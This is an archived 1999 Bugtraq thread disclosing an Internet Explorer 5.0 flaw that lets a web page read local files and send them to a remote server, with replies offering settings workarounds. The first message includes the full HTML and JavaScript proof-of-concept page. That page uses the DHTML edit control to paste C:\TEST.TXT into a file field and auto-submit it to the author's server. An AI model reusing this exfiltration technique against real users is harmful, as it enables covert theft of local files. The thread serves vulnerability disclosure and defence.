Date: Tue, 30 Mar 1999 19:35:16 +0300 From: Georgi Guninski <joro@NAT.BG> To: BUGTRAQ@netspace.org Subject: IE 5.0 allows reading and sending local files to a remote server There is a security bug in Internet Explorer 5.0, which allows reading and sending local files to a remote server. The problem is a bug in the DHTML edit control, which allows pasting a filename in a FILE object. When the form is submitted via JavaScript, the contents of the file are sent to a remote server. Demonstration is available at: http://www.nat.bg/~joro/fr.html Workaround: Disable JavaScript I would like to thank Juan Cuartango (http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE exploits, which helped me a lot for discovering this vulnerability! Regards, Georgi Guninski http://www.nat.bg/~joro ------------------------------------------------------------------------- [http://www.nat.bg/~joro/fr.html] <HTML><HEAD><TITLE>IE 5.0 file reading</TITLE> </HEAD> <BODY> There is a bug in Internet Explorer 5.0 which allows reading and sending local files. <BR> The file name must be known. <BR> Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability! <BR> Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A> <BR> Workaround: Disable JavaScript <BR> <BR> <INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT"> <SCRIPT> function f1() { document.all.A1.select(); document.execCommand("copy"); dh.DOM.forms(0).elements(0).focus(); dh.execCommand(5032); setTimeout("dh.DOM.forms(0).submit();",1000); } function f() { alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time"); dh.loadURL("http://www.nat.bg/~joro/form3.html"); setTimeout("f1()",2000); } setTimeout("f();",1000); </SCRIPT> <OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh width=700> </OBJECT> </BODY> </HTML> ------------------------------------------------------------------------- Date: Wed, 31 Mar 1999 09:14:47 +0100 From: Andrew Tulloch <frohicky@TECHNOLOGIST.COM> To: BUGTRAQ@netspace.org Subject: Re: IE 5.0 allows reading and sending local files to a remote server If you look under scripting options in security settings there is the option "Allow paste via script" simply turning this to disabled provides this result: <paste> See the contents of your file among the other stuff ---------------------------------------------------------------------------- ---- -----------------------------7cf26c3b6a8 Content-Disposition: form-data; name = "a"; filename="" Content-Type: application/octet-stream -----------------------------7cf26c3b6a8-- </paste> which as far as I see has disabled the reading of local files and is a little less drastic than disabling all JavaScript. Regards, Andrew Tulloch ------------------------------------------------------------------------- Date: Wed, 31 Mar 1999 14:05:21 -0800 From: "Stephen Purpura (MSFDC-JV)" <v-spurpu@MICROSOFT.COM> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: IE 5.0 allows reading and sending local files to a remote server There is another workaround. In IE5, if you use the "built in" feature to limit scripted paste operations then the problem doesn't seem to manifest. Try the following and goto the sample implementation: Tools menu --> Internet options --> security tab --> custom level --> allow paste operations via script = prompt or disable Stephen